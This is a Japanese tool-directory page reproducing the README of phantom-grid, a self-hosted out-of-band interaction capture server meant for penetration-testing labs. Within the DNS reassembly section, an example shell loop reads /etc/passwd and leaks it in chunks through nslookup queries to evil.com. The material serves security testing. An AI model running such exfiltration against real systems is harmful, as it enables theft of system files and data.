Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
phantom-grid — 無料のBurp Collaborator代替 - SQLiteとexfil再構築によるOOBインタラクションキャプチャ(HTTP/HTTPS/DNS) | Kitploit
ツール/GitHubGitHub/evkir/phantom-grid
ペイロード生成脆弱性分析ウェブアプリケーション悪用データ流出情報収集ウェブセキュリティペネトレーションテストユーティリティとフレームワークレッドチーミングDNS分析
GitHubevkir/phantom-grid
1121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

phantom-grid

無料のBurp Collaborator代替 - SQLiteとexfil再構築によるOOBインタラクションキャプチャ(HTTP/HTTPS/DNS)

リポジトリを見るウェブサイト

Phantom Grid

⬡ Phantom Grid

ペネトレーションテストラボ向けの無料オープンソース Burp Collaborator 代替ツール
アウトオブバンド (OOB) インタラクションキャプチャ · HTTP/HTTPS · DNS · SQLite · 持ち出しデータ再構築


これは何か?

Phantom Grid はセルフホスト型の OOB (アウトオブバンド) インタラクションキャプチャツールであり、ペネトレーションテストラボ (PortSwigger Web Security Academy、HackTheBox、TryHackMe など) を攻略するための Burp Collaborator の無料代替ツールです。

v2.0 の機能

機能説明
HTTP + HTTPS キャプチャ自動生成された自己署名 TLS 証明書によるデュアルスタック
DNS キャプチャポート 53 の組み込み DNS サーバー
DNS 持ち出しデータ再構築複数パートの DNS 持ち出しからの自動チャンク再構築
SQLite 永続化すべてのデータがサーバー再起動後も保持される (パフォーマンスのため WAL モード)
40 以上のペイロードテンプレートSSRF、XXE、SQLi OOB、CMDi、SSTI、DNS 持ち出し — すぐにコピー可能
タクティカルダッシュボードリアルタイム監視を備えたコマンドセンター UI
Docker 対応ワンコマンドデプロイ
REST APIトークン/インタラクション/持ち出しデータの完全な管理 API

クイックスタート

オプション 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

オプション 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

オプション 3: ngrok (VPS のないラボ向け)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

アーキテクチャ

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

HTTPS サポート

最近のアプリはしばしば混合コンテンツリクエスト (https:// ページからの http://) をブロックします。Phantom Grid v2.0 は HTTP と並行して HTTPS を実行します。

自動生成された自己署名証明書

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

カスタム証明書 (Let's Encrypt など)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

ngrok を使用する場合 (即座に公開 HTTPS)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

DNS 持ち出しデータの再構築

Phantom Grid はチャンク化された DNS 持ち出しデータを自動的に再構築します。これは、複数の DNS ルックアップに分割する必要がある大きなペイロード (ラベルは 63 バイトに制限) を抽出するために重要です。

サポートされるフォーマット

フォーマット例ユースケース
シンプルdata.TOKEN.domain単一値の持ち出し
インデックス付き0.chunk1.TOKEN.domain自動セッション、順序付きチャンク
タグ付きsess1.0.chunk1.TOKEN.domain順序付けされた名前付きセッション
終了シグナルend.sess1.TOKEN.domainセッション完了をマーク

例: DNS 経由で /etc/passwd を持ち出す

ターゲット上で:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

再構築されたデータを表示:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

レスポンス:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

SQLite 永続化

すべてのデータは同時読み書きパフォーマンスのために SQLite WAL モードを使用して phantom_grid.db に保存されます。

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

データはサーバー再起動後も保持されます。phantom_grid.db をコピーしてバックアップします。


API リファレンス

トークン

メソッドエンドポイント説明
GET/api/tokens統計付きですべてのトークンを一覧表示
POST/api/tokensトークンを作成 {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>トークンのラベル/ノートを更新
DELETE/api/tokens/<id>トークンとすべてのデータを削除 (CASCADE)

インタラクション

メソッドエンドポイント説明
GET/api/tokens/<id>/interactions?limit=&offset=トークンのインタラクションを取得
DELETE/api/tokens/<id>/interactionsインタラクションをクリア
GET/api/log?limit=グローバルログ (すべてのトークン)
GET/api/poll?since=<ISO>新しいインタラクションをポーリング

DNS 持ち出し

メソッドエンドポイント説明
GET/api/tokens/<id>/exfil再構築されたデータを含む持ち出しセッションを取得

システム

メソッドエンドポイント説明
GET/api/statsグローバル統計 (カウント、DB サイズ)
GET/healthヘルスチェック

キャプチャエンドポイント

プロトコルエンドポイント
HTTPhttp://server:9090/c/<TOKEN>
HTTPShttps://server:9443/c/<TOKEN>
DNS<TOKEN>.yourdomain.com
DNS 持ち出し<data>.<TOKEN>.yourdomain.com

CLI オプション

python server.py [OPTIONS]

  --port N          HTTP port (default: 9090)
  --https           Enable HTTPS server
  --https-port N    HTTPS port (default: 9443)
  --cert PATH       Custom TLS certificate (PEM)
  --key PATH        Custom TLS key file
  --dns             Enable DNS capture server
  --dns-port N      DNS port (default: 53)
  --dns-ip IP       IP returned in DNS responses (default: 127.0.0.1)
  --db PATH         SQLite database path (default: phantom_grid.db)

代替ツールとの比較

機能Burp CollaboratorInteractshPhantom Grid
価格Burp Pro ($$$)無料無料
HTTP/HTTPS✅✅✅
DNS キャプチャ✅✅✅
DNS 持ち出しデータ再構築❌❌✅
SMTP キャプチャ✅✅❌ (ロードマップ)
セルフホスト❌✅✅
カスタムドメイン❌✅✅
永続ストレージN/A❌✅ (SQLite)
ダッシュボード UIBurp SuiteCLIWeb UI
ペイロードテンプレート❌❌✅ (40 以上)

ペイロードカテゴリ

ダッシュボードには 40 以上のすぐにコピーできるペイロードが含まれています:

ツールをダウンロード